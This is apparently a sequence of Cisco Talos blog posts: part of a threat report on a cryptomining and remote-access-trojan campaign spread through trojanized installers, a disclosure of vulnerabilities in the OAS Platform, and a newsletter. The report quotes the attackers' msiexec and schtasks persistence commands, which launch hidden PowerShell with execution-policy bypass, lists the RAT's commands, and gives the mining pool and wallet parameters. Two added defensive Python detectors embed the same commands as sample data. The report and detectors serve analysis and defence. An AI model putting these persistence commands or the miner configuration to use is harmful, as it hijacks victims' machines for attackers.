The attacker has used multiple wallet addresses since the campaign began in 2021 to facilitate mining different cryptocurrencies. In this campaign, we observed the attacker using the wallet addresses β€œ0xbEB015945E9Da17dD0dc9A4b316f8F3150d93352” and β€œ0xbCa8d14Df89cc74B158158E55FCaF5022a103795” for Ethereum Classic (ETC) and for FLUX (ZelHash) they used β€œt1KHZ5Piuo4Ke7i6BXfU4” and β€œt1KHZ5Piuo4Ke7i6BXfU4A.” Talos’ analysis of ETC transactions in the blockchain revealed that the attacker had made cryptocurrency transfers to several other wallets from those parent wallets. Based on this data, we compiled a timeline of the attacker’s mining activity and the number of ETCs mined since November 2021.

After only mining a few Ethereum in November and December 2021, their activity took off in October 2022. In January 2023, the adversaries generated more than 50 Ethereum Classic, and on July 9, 2023, alone mined more than 50 (the equivalent of about $800 USD based on current values).

Two methodologies used to establish a backdoor or implant cryptominers

Talos discovered two multi-stage attack methodologies the attacker employed in this campaign. The first methodology shows how the M3_Mini_Rat client stub was installed and used to establish a backdoor to the victim’s machine. The second outlines how PhoenixMiner and lolMiner were implanted for cryptomining. We could not determine how the trojanized software installers were initially delivered to the victims’ machines. In the past, we have commonly seen such trojanized installers delivered using the search engine optimization (SEO) poisoning technique.

Attack method 1: Installing M3_Mini_Rat client stub

Figure: Summary of the first attack method.

The attack sequence is initiated when a victim clicks on a legitimate software installer that the attacker bundled with a malicious script using Advanced Installer. The installer then drops a malicious batch script named “core.bat” and the legitimate PE executable “viewer.exe,” an Advanced Installer component, as “MSI72E2.tmp” in the local user profile’s application data temporary folder. To execute the malicious script, the attackers abused Advanced Installer’s Custom Action feature by including command-line arguments that execute the dropped malicious batch file.

During the installation process, msiexec.exe, the Windows Installer executable that interprets installation packages and installs products on target systems, runs “MSI72E2.tmp” (viewer.exe) with the configured command-line arguments, which execute the malicious batch script. The example identified while analyzing the sample in our sandbox is shown below:

msiexec.exe C:\Windows\Installer\MSI72E2.tmp /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Temp\core.bat"

Then, the software installer creates a folder called β€œwebgard” in the local user profile roaming folder, and drops a malicious PowerShell loader script named β€œcor.ps1” (PS-1) and an encrypted file named β€œcore.bin” which is the M3_Mini_RAT client stub.

The malicious batch script β€œcore.bat”, which was dropped during the initial execution stage of the software installer, contains a command to configure the task scheduler in the victim’s machine. It creates a task named β€œViGEmBusUpdater” that runs every minute to execute the malicious PowerShell loader script in the β€œwebgard” folder. The attacker may have chosen the name β€œViGEmBusUpdater” to evade detection by masquerading as the legitimate β€œViGEmBusUpdater” executable. The task scheduler command is shown below:

schtasks /create /NP /sc minute /mo 1 /tn "ViGEmBusUpdater" /tr " 'powershell' -ExecutionPolicy ByPass -WindowStyle Hidden %appdata%\Webgard\cor.ps1" /f

The “ViGEmBusUpdater” task executes the malicious PowerShell loader script, which decrypts the encrypted file “core.bin” to generate the M3_Mini_Rat client stub and run it in the victim’s machine memory. The M3_Mini_Rat client stub attempts to connect to the C2; however, during our analysis the C2 was unresponsive, so we were unable to observe any subsequent payloads, particularly cryptominers.

Figure: Screen capture of the PowerShell loader (PS-1).

Attack method 2: Installing PhoenixMiner and lolMiner

Figure: Summary of the second attack method.

In the second method, the attacker also abuses Advanced Installer and its Custom Actions feature to drop malicious batch scripts. As in method one, user interaction is required to run the software installer that has been bundled using Advanced Installer, which drops β€œviewer.exe” as a temporary file with a random filename and β€œcore.bat” in the local user profile application data temporary folder. The second method is slightly different, as the installer is also bundled with a second batch script called β€œwin.bat” that is dropped and saved alongside the other files. Then, β€œviewer.exe” executes the two dropped batch files based on the Custom Action commands, as previously outlined.

Another similarity between the two methods is that the software installer creates a folder, in this instance called β€œWinsoft,” in the local user roaming profile and drops a malicious PowerShell loader script β€œcore.ps1” (PS-1) and an encrypted file β€œcore.bin” (ENC-1).

The malicious batch script “win.bat” configures the task scheduler by creating a task “MSI Task Host - Detect_Monitor” that runs every two hours to execute the malicious PowerShell loader script “core.ps1” (PS-1) from the location “%appdata%\winsoft.” The task scheduler command executed by “win.bat” is shown below.

win.bat

schtasks /create /NP /sc minute /mo 120 /tn "MSI Task Host - Detect_Monitor" /tr " 'powershell' -ExecutionPolicy ByPass -WindowStyle Hidden %appdata%\Winsoft\core.ps1" /RL HIGHEST /f

When the scheduled task β€œMSI Task Host - Detect_Monitor” is run, the PowerShell loader script (PS-1) is executed, which decrypts the encrypted file β€œcore.bin” (ENC-1), generating and executing a PowerShell downloader script.

Figure: Screen capture of the dropped PowerShell loader (PS-1).

The PowerShell downloader downloads a malicious ZIP archive from an attacker-controlled server to the %windir% location on the victim’s machine. It unzips its contents to drop another PowerShell loader script “core.ps1” (PS-2), an encrypted file (ENC-2), and the PhoenixMiner executable, an Ethash miner, under the filename “svhost.exe.”

Figure: A snippet of the PowerShell downloader, which runs in the victim’s machine memory.

The malicious batch script, β€œcore.bat,” has the command to create the task β€œViGEmBusUpdater” and configures it to run every minute to execute the downloaded PowerShell loader script (PS-2) from the location %windir%. The task scheduler commands executed by core.bat are shown below.

core.bat

schtasks /create /ru SYSTEM /sc minute /mo 1 /tn "ViGEmBusUpdater1" /tr " 'powershell' -ExecutionPolicy Bypass %windir%\core.ps1" /f

The downloaded PowerShell loader script (PS-2) is executed from the %windir% location when the scheduled task “ViGEmBusUpdater” runs; it decrypts the dropped encrypted file (ENC-2) to generate and execute a PowerShell launcher script in the victim’s system memory.

Figure: Screen capture of the downloaded PowerShell loader (PS-2).

The PowerShell launcher runs PhoenixMiner from the victim machine’s Windows systems folder with the Ethereum Classic mining parameters. The attacker uses the filename β€œsvhost.exe,” which closely matches the legitimate Windows executable filename β€œsvchost.exe” in the Windows systems folder, possibly trying to go unnoticed or undetected by the malicious process-scanning engines of endpoint security products.

Figure: Screen capture of the PowerShell launcher that executes in memory to run PhoenixMiner.

In our analysis of another trojanized software installer sample, the attack chain remains the same as the second attack method except for the payload, which is lolMiner. The attacker gave lolMiner the file name “svshost.exe,” possibly to masquerade as “svchost.exe,” dropped it in the location %windir%, and ran it using the PowerShell launcher script for FLUX (ZelHash) mining.
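The msiexec Custom Action invocation and the three schtasks commands quoted in the two attack methods above give a defender concrete command-line patterns to hunt for. The Python script below is an added example, not Talos code and not part of the original post: it scores process-creation command lines (the kind recorded by Sysmon Event ID 1 or Windows Security event 4688) against those patterns, namely msiexec launching an Advanced Installer .tmp helper with /RunAsAdmin and /HideWindow to run a batch file from a user Temp folder, and schtasks /create registering a high-frequency task that runs hidden PowerShell with -ExecutionPolicy Bypass from %appdata% or %windir%. The sample command lines are constructed from the commands quoted in this post plus two benign ones; the script-location list, the 60-minute threshold and the two-indicator minimum are assumptions to tune per environment.

```python
import re

# Constructed sample process command lines, modelled on the commands quoted in this
# post plus two benign ones. Not real telemetry; added example, not Talos code.
SAMPLE_CMDLINES = [
    r'msiexec.exe C:\Windows\Installer\MSI72E2.tmp /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Temp\core.bat"',
    r'''schtasks /create /NP /sc minute /mo 1 /tn "ViGEmBusUpdater" /tr " 'powershell' -ExecutionPolicy ByPass -WindowStyle Hidden %appdata%\Webgard\cor.ps1" /f''',
    r'''schtasks /create /NP /sc minute /mo 120 /tn "MSI Task Host - Detect_Monitor" /tr " 'powershell' -ExecutionPolicy ByPass -WindowStyle Hidden %appdata%\Winsoft\core.ps1" /RL HIGHEST /f''',
    r'''schtasks /create /ru SYSTEM /sc minute /mo 1 /tn "ViGEmBusUpdater1" /tr " 'powershell' -ExecutionPolicy Bypass %windir%\core.ps1" /f''',
    r'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"',
    r'msiexec.exe /i C:\Installers\app.msi /qn',
]

# Locations the loaders in this post are launched from (assumption: tune per environment).
SCRIPT_LOCATIONS = ("%appdata%", "%windir%", "%temp%", "\\appdata\\", "\\temp\\", "\\windows\\")

# "/option" optionally followed by a value. A value never starts with "/", so
# value-less switches such as /NP and /f do not swallow the next option.
_OPT_RE = re.compile(r'/(\w+)(?:\s+("[^"]*"|[^\s/]\S*))?')


def parse_schtasks(cmdline):
    """Return {option: value} for a schtasks command line; values are unquoted, keys lower-case."""
    fields = {}
    for m in _OPT_RE.finditer(cmdline):
        fields[m.group(1).lower()] = (m.group(2) or "").strip().strip('"').strip()
    return fields


def assess_schtasks(cmdline):
    """List the persistence indicators from this post present in a schtasks /create line."""
    low = cmdline.lower().lstrip()
    if not low.startswith("schtasks") or "/create" not in low:
        return []
    f = parse_schtasks(cmdline)
    action = f.get("tr", "").lower()
    reasons = []
    if f.get("sc", "").lower() == "minute":
        try:
            every = int(f.get("mo") or "1")
        except ValueError:
            every = 1
        if every < 60:
            reasons.append(f"high-frequency trigger (every {every} minute(s))")
    if "powershell" in action:
        if "-executionpolicy" in action and "bypass" in action:
            reasons.append("PowerShell launched with -ExecutionPolicy Bypass")
        if "-windowstyle" in action and "hidden" in action:
            reasons.append("PowerShell window hidden")
        if any(loc in action for loc in SCRIPT_LOCATIONS):
            reasons.append("script run from %appdata%, %windir% or a temp directory")
    if f.get("ru", "").upper() == "SYSTEM" or f.get("rl", "").upper() == "HIGHEST":
        reasons.append("task runs as SYSTEM or with highest privileges")
    return reasons


def assess_msiexec(cmdline):
    """List indicators of the Advanced Installer Custom Action abuse described in this post."""
    low = cmdline.lower().lstrip()
    if not low.startswith("msiexec"):
        return []
    reasons = []
    if re.search(r"\\installer\\msi[0-9a-f]+\.tmp", low):
        reasons.append("msiexec runs a Custom Action helper (.tmp) from C:\\Windows\\Installer")
    if "/runasadmin" in low:
        reasons.append("Custom Action requests elevation (/RunAsAdmin)")
    if "/hidewindow" in low:
        reasons.append("Custom Action hides its window (/HideWindow)")
    if re.search(r'\\temp\\[^\s"]+\.(bat|cmd|ps1)', low):
        reasons.append("batch/PowerShell script in a Temp folder passed as argument")
    return reasons


def analyze(cmdlines, min_indicators=2):
    """Return (cmdline, reasons) pairs for lines matching at least min_indicators indicators."""
    hits = []
    for cmd in cmdlines:
        reasons = assess_schtasks(cmd) + assess_msiexec(cmd)
        if len(reasons) >= min_indicators:
            hits.append((cmd, reasons))
    return hits


if __name__ == "__main__":
    for cmd, reasons in analyze(SAMPLE_CMDLINES):
        print(cmd[:80] + ("..." if len(cmd) > 80 else ""))
        for r in reasons:
            print("   -", r)
```

Requiring two independent indicators keeps a lone hidden-window PowerShell task or a single elevated installer action from paging anyone, while every command quoted in this post trips four. The same scoring can be fed from a SIEM query over the process creation events rather than from the constructed list.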

Payloads

The payloads delivered in this campaign are an M3_Mini_Rat client, an Ethash miner called PhoenixMiner, or lolMiner.

M3_Mini_Rat Client to establish a backdoor

M3_Mini_Rat client is a PowerShell script with remote administration capabilities that mainly focuses on performing system reconnaissance and downloading and executing other malicious binaries. The RAT client is built with a builder associated with the administration panel for M3_Mini_Rat, a .Net application whose author is called β€œMr3.” Version 0.1 is currently the only one in the wild. The RAT uses its administration panel to perform remote administration activities on the victim’s machine via the RAT client after successfully implanting the RAT client stub. From the administration panel, the RAT can perform several remote administration functionalities, including File System activities, capturing screenshots, executing arbitrary commands, and sending files to the victim’s machine by loading them into the victim’s system memory or dropping them in the filesystem.

Figure: An example of the M3_Mini_Rat administration console.

When executed in the victim’s system memory, the RAT client stub connects to the command and control server by establishing a TCP connection on port 3434. Once successfully connected, an attacker can perform remote administration tasks shown in the M3_Mini_Rat administration panel and send commands for the RAT client to serve.

Figure: A sample code snippet of the M3_Mini_Rat client stub showing C2 connection instructions.

The RAT client can execute the following commands (command: function):

pc: Performs reconnaissance and collects data, including username, desktop name, operating system version, anti-virus, .Net status, CPU and GPU.
cl: Exits the RAT client.
dis: Disposes of the data in the TCP stream and closes the connection.
opr: Lists all running processes and collects the process IDs.
prc: Lists all running processes and collects the process IDs and executable paths.
kpr: Stops the specific process with the target process ID as directed by the C2.
sh: Checks whether the Citrix Connection Center is running by checking whether the main window title of the running process is “concentr.exe.”
frm: Sends the data to the C2 server.
drv: Enumerates the filesystem object, lists the logical drive names on the victim’s machine, and sends the recon data to the C2.
fld: Gets the details of the target folder specified by the C2.
dwn: Downloads the data as base64-encoded strings, decodes them and writes them to the variable defined in the RAT client script. The RAT client then sends the decoded data back to the C2.
runas: Runs the malicious executable sent by the C2.
up: Downloads the base64-encoded binary/data to a path specified by the attacker on the victim’s machine.
uns: Exits the RAT client instance.
up1: Downloads the base64-encoded binary by decoding it and writing it to a filename specified by the C2 in the %AppData%\local\Temp folder, then starts the dropped binary.
img: Checks whether the payload was dropped properly by reading the contents of the dropped file, converting them into a base64-encoded data stream and uploading it to the C2 stream.
mf: Renames the downloaded file with the filename directed by the C2.
df: Deletes the dropped file.
cvs: Writes the data to the C2 TCP stream.

PhoenixMiner to mine ETC

PhoenixMiner is an Ethash (ETH, ETC, Musicoin, EXP, UBQ, etc.) miner that supports AMD and Nvidia cards and works on the Ethash cryptocurrency algorithm. When executed, it utilizes the victim’s computer GPU power to mine Ethash. It is publicly available to download through the URL hxxps[://]phoenixminer[.]org.

In this campaign, the attacker runs PhoenixMiner with the following mining pool parameters (parameter: value - description):

pool: eu1-etc[.]ethermine[.]org[:]4444 - Ethash pool address
pool2: ssl[://]eu1-etc[.]ethermine[.]org[:]5555 - Failover Ethash pool address
wal: 0xbEB015945E9Da17dD0dc9A4b316f8F3150d93352 and 0xbCa8d14Df89cc74B158158E55FCaF5022a103795 - Crypto wallet addresses
worker: Rig0 and RigY - Worker name
pass: x - Ethash wallet password
proto: 3 - qtminer as the stratum protocol for the Ethash pool
log: 0 - No logs to be written
powlim: 75 - GPU power limit of 75%
fanmax: 65 - Maximum system fan speed of 65%
coin: etc - Ethereum Classic

lolMiner to mine Flux

lolMiner is a cryptocurrency miner that uses the GPU capabilities of computers to mine a variety of cryptocurrencies. It supports AMD, Nvidia and Intel cards. The lolMiner build identified in this campaign is version 1.76, which is publicly available on GitHub. It can also mine two different cryptocurrencies at the same time.

The attacker in this campaign uses lolMiner to mine FLUX (ZelHash) with the following mining parameters (parameter: value - description):

algo: FLUX - Algorithm to mine
pool: educu[.]xyz[:]9999 - Mining pool
user: t1KHZ5Piuo4Ke7i6BXfU4 and t1KHZ5Piuo4Ke7i6BXfU4A - Wallet or pool user account to mine to
pl: 75 - Power limit value for the GPUs
tstop: 70 - Temperature at which a GPU pauses or stops mining
tstart: 65 - Minimum temperature for a GPU to start mining
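Both parameter tables above (PhoenixMiner and lolMiner) list the pool, wallet and worker values as they appear on the miner's command line, which is where endpoint telemetry exposes a miner regardless of the filename it hides behind. The Python script below is an added example, not Talos code and not part of the original post: it parses miner-style argument lists, refangs the defanged values so they compare with live telemetry, extracts pool and wallet indicators for blocking, and flags a binary whose name is within one character of svchost.exe but does not live in System32 (the svhost.exe and svshost.exe masquerade described in this post). The sample process list is constructed from the values in the two tables (kept defanged, as printed here) plus one legitimate svchost entry; the switch-name lists, the system-binary list and the 20-character wallet heuristic are assumptions.

```python
import re

# Constructed sample (image path, argument string) pairs built from the parameter tables in
# this post; pool and wallet values are kept defanged exactly as the post prints them.
# Not real telemetry; added example, not Talos code.
SAMPLE_PROCESSES = [
    (r"C:\Windows\svhost.exe",
     "-pool eu1-etc[.]ethermine[.]org[:]4444 -pool2 ssl[://]eu1-etc[.]ethermine[.]org[:]5555 "
     "-wal 0xbEB015945E9Da17dD0dc9A4b316f8F3150d93352 -worker Rig0 -pass x -proto 3 "
     "-log 0 -powlim 75 -fanmax 65 -coin etc"),
    (r"C:\Windows\svshost.exe",
     "--algo FLUX --pool educu[.]xyz[:]9999 --user t1KHZ5Piuo4Ke7i6BXfU4A --pl 75 --tstop 70 --tstart 65"),
    (r"C:\Windows\System32\svchost.exe", "-k netsvcs -p -s Schedule"),
]

POOL_KEYS = ("pool", "pool2", "o", "url")          # assumption: common pool switches
WALLET_KEYS = ("wal", "user", "u", "wallet")       # assumption: common wallet switches
SYSTEM_BINARIES = ("svchost.exe", "lsass.exe", "csrss.exe")   # assumption: names worth guarding
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")
ETH_ADDR = re.compile(r"^0x[0-9a-fA-F]{40}$")
POOL_RE = re.compile(r"^(?:(?:stratum\+)?(?:ssl|tcp|stratum)://)?[a-z0-9.-]+\.[a-z]{2,}:\d{2,5}$", re.I)


def refang(value):
    """Undo report-style defanging ([.] [:] [://] hxxp) so values compare with live telemetry."""
    return (value.replace("[://]", "://").replace("[.]", ".").replace("[:]", ":")
            .replace("hxxps", "https").replace("hxxp", "http"))


def parse_args(args):
    """Map '-key value' / '--key value' pairs; switches without a value map to ''."""
    tokens, out, i = args.split(), {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-"):
            key = tok.lstrip("-").lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                out[key] = tokens[i + 1]
                i += 2
                continue
            out[key] = ""
        i += 1
    return out


def levenshtein(a, b):
    """Edit distance, used to catch one-character lookalikes of system binary names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_name(image):
    """Return the system binary a process name mimics, or runs under from the wrong directory."""
    low = image.lower()
    name = low.rsplit("\\", 1)[-1]
    for real in SYSTEM_BINARIES:
        if name == real:
            if not any(d in low for d in SYSTEM_DIRS):
                return real      # right name, wrong directory
        elif levenshtein(name, real) <= 1:
            return real          # e.g. svhost.exe / svshost.exe vs svchost.exe
    return None


def extract_miner_iocs(image, args):
    """Pull pool/wallet indicators and miner-like reasons out of one process record."""
    a = parse_args(args)
    rec = {"image": image, "pools": [], "wallets": [], "reasons": []}
    for key in POOL_KEYS:
        value = refang(a.get(key, ""))
        if POOL_RE.match(value):
            rec["pools"].append(value)
    for key in WALLET_KEYS:
        value = a.get(key, "")
        # ETH/ETC addresses are exact; other coins' addresses are long alphanumeric strings (heuristic)
        if ETH_ADDR.match(value) or (len(value) >= 20 and value.isalnum()):
            rec["wallets"].append(value)
    if rec["pools"]:
        rec["reasons"].append("mining pool host:port on command line")
    if rec["wallets"]:
        rec["reasons"].append("wallet address on command line")
    if a.get("coin") or a.get("algo"):
        rec["reasons"].append("coin/algorithm switch present (%s)" % (a.get("coin") or a.get("algo")))
    mimic = lookalike_name(image)
    if mimic:
        rec["reasons"].append("binary name mimics %s outside its system directory" % mimic)
    return rec


def scan(processes):
    """Return records for processes whose command line names at least one mining pool."""
    return [r for r in (extract_miner_iocs(img, args) for img, args in processes) if r["pools"]]


if __name__ == "__main__":
    for rec in scan(SAMPLE_PROCESSES):
        print(rec["image"], "pools:", rec["pools"], "wallets:", rec["wallets"])
        print("   reasons:", "; ".join(rec["reasons"]))
```

The pool host:port pairs the scan returns are what belongs on a DNS or egress blocklist, and the wallet strings are stable enough to match across every installer variant of the campaign. The name check is deliberately independent of the miner logic, so a lookalike system binary with no mining arguments still surfaces if the record is inspected with lookalike_name alone.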

Coverage

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The Snort SID for this threat is 62325.

ClamAV detections are available for this threat:

Win.Backdoor.M3MiniRAT-10007342-0

Win.Trojan.MaliciousInstaller-10007344-0

Win.Loader.PowerShellDecrypter-10007381-0

Win.Trojan.MaliciousInstaller-10007345-0

Win.Coinminer.PhoenixMiner-10007386-0

Win.Coinminer.lolMiner-10007385-0

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries related to this threat, please follow the link here.

Indicators of Compromise

Indicators of Compromise associated with this threat can be found here.

Eight vulnerabilities in Open Automation Software Platform could lead to information disclosure, improper authentication

6 September 2023 at 16:46

Cisco Talos recently disclosed eight vulnerabilities in the engine configuration functionality in Open Automation’s Software Platform.

OAS Platform is commonly found in industrial operations and enterprise environments. It allows various devices, including PLCs, servers, files, databases and internet-of-things platforms to communicate with one another and share data when they otherwise would be unable to because of their various protocols.

The vulnerabilities Talos disclosed on Sept. 5 all exist inside the OAS Platform’s Engine configuration management functionality. Through the configuration tool, users can load or save a set of configurations to a disk and install it on other devices.

TALOS-2023-1775 (CVE-2023-35124), TALOS-2023-1776 (CVE-2023-34353) and TALOS-2023-1774 (CVE-2023-32271) can all lead to the disclosure or decryption of sensitive information on the targeted device.

TALOS-2023-1769 (CVE-2023-31242) and TALOS-2023-1770 (CVE-2023-34998) could also allow an adversary to gain access to the OAS Platform system if they send a specially crafted set of network requests. TALOS-2023-1772 (CVE-2023-34317) can also be triggered if the adversary exploits one of the two previously mentioned to authenticate into the system. Lastly, TALOS-2023-1771 (CVE-2023-32615) fits into this attack chain after an adversary authenticates in, allowing them to overwrite or create a new file on behalf of the logged-in OAS user.

TALOS-2023-1773 (CVE-2023-34994) is inherent in the software’s design: an application user who is not authorized on the underlying system can create new directories anywhere the underlying OAS user system account has access, allowing the unauthorized user to create new, unwanted directories.

Talos worked with Open Automation to ensure these vulnerabilities are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

For Snort coverage (SIDs 61991 - 61994, 62003 and 62004) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

New open-source infostealer, and reflections on 2023 so far

31 August 2023 at 18:00

Welcome to this week’s edition of the Threat Source newsletter.

I’m covering for Jon this week whilst he takes some well-deserved holiday. What’s on my mind this week? Well, apart from a new horror film that I just read about called β€œSlotherhouse” where the killer is, um, a sloth (I predict nothing but a masterpiece), there are a couple of things on my mind relating to open-source.

Firstly, on the bad actor side of things, we’re seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SapphireStealer,” which you can read about below.

When I spoke to Cisco Talos’ Head of Outreach, Nick Biasini, about the biggest trends of 2023 so far, he called out how attackers are increasingly using malicious open-source tooling. This has been a large part of the reason we are seeing a continuous fracturing of the ransomware and extortion landscape, as threat actors find what they need online, adapt these tools to suit their needs, and in many cases add anti-detection mechanisms.

Speaking of 2023 trends, I just uploaded a new playlist of 1–2-minute long videos featuring Nick’s thoughts and explanations on some of the biggest threats we’ve seen so far this year - including the evolution of ransomware, the rise in commercial spyware, and supply chain attacks. Check out the playlist. As a preview, here's Nick talking about the evolution of ransomware in 2023:

On the flip side, open-source is of course one of the most important ways in which security defenders can learn, upskill, and share their findings with the community. That’s one of the reasons why Talos creates and releases open-source software, for free.

Just in case you don’t know about our open-source tools, which have been developed by some of the smartest brains on the planet, you should check them out. We have around 27 tools which are available to download on our website at talosintelligence.com/software and on GitHub. The latest and greatest of these is the NIM-IDA-FLIRT Generator tool.

Oh, I just read that β€œSlotherhouse” will not only feature a killer sloth, it’s called Alpha, and their weapon of choice is a samurai sword. One ticket please.

The one big thing

SapphireStealer, an open-source information stealer, has been increasingly observed across public malware repositories since its initial release in December 2022. SapphireStealer is an example of a new type of information stealer, which is mostly designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information.

While infostealers have been around for a very long time, Talos has recently seen an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces.

Why do I care?

As is often the case following the release of a new open-source malware codebase, threat actors acted quickly and began to experiment. Some threat actors have even extended SapphireStealer to support added functionality and used other tooling to make the detection of SapphireStealer infections more difficult (again, another increasing trend we’re seeing across the threat landscape). Infostealers remain a popular choice for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information to adversaries.

So now what?

A comprehensive blog written by Edmund Brumaghin covers the background behind SapphireStealer, and our research on the tool, including a case study where we saw multiple failures on the part of the threat actor to maintain sound operational security. The blog includes Snort SIDs, and indicators of compromise.

Top security headlines of the week

  • Operation “Duck Hunt” proactively removes Qakbot malware from 700,000 infected machines. In one of the largest operations of its kind, federal law enforcement took decisive action against one of the most widely used and longstanding botnets. According to the U.S. Department of Justice, these efforts resulted in Qakbot being “neutralized” from hundreds of thousands of devices. According to TechCrunch, “The Department of Justice also announced the seizure of more than $8.6 million in cryptocurrency from the Qakbot cybercriminal organization, which will now be made available to victims”. Dark Reading TechCrunch
  • What’s in a name? Strange behaviors at top-level domains create uncertainty in DNS. When Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, it ignited a firestorm of controversy as security organizations warned against the confusion that was certain to occur. Talos researcher Jaeson Schultz recently wrote about the consequences of Google’s decision, including how, in the worst-case scenario, confusion over whether some name is a public DNS name or another private resource can cause sensitive data to fall into the hands of unintended recipients. Talos blog.
  • OpenAI rolls out a business edition of ChatGPT, promising β€œenterprise-grade security”. OpenAI says it is making a commitment not to use client-specific prompts and data in the training of its models. SecurityWeek writes that β€œthe security-centric features of the new ChatGPT Enterprise are meant to address ongoing business concerns about the protection of intellectual property and the integrity of sensitive corporate data when using LLM (large language model) algorithms.” SecurityWeek

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MITRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often techniques are thrown at the bottom of reports and blogs without any context, never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6

MD5: 4c9a8e82a41a41323d941391767f63f7

VirusTotal: https://www.virustotal.com/gui/file/1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6/details

Typical Filename: !!Mreader.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Generic::sheath

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b

MD5: f5e908f1fac5f98ec63e3ec355ef6279

VirusTotal: https://www.virustotal.com/gui/file/7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b/details

Typical Filename: IMG001.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Coinminer::tpd

SapphireStealer: Open-source information stealer enables credential and data theft

31 August 2023 at 12:00
  • SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
  • Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion.
  • We assess with moderate confidence that multiple entities are using SapphireStealer and have separately improved and modified the original code base, extending it to support additional data exfiltration mechanisms and leading to the creation of several variants.
  • In some cases, SapphireStealer appears to be delivered as part of a multi-stage infection process, with threat actors leveraging open-source malware downloaders like FUD-Loader to deliver SapphireStealer to potential victims.

SapphireStealer goes open-source, attackers take notice

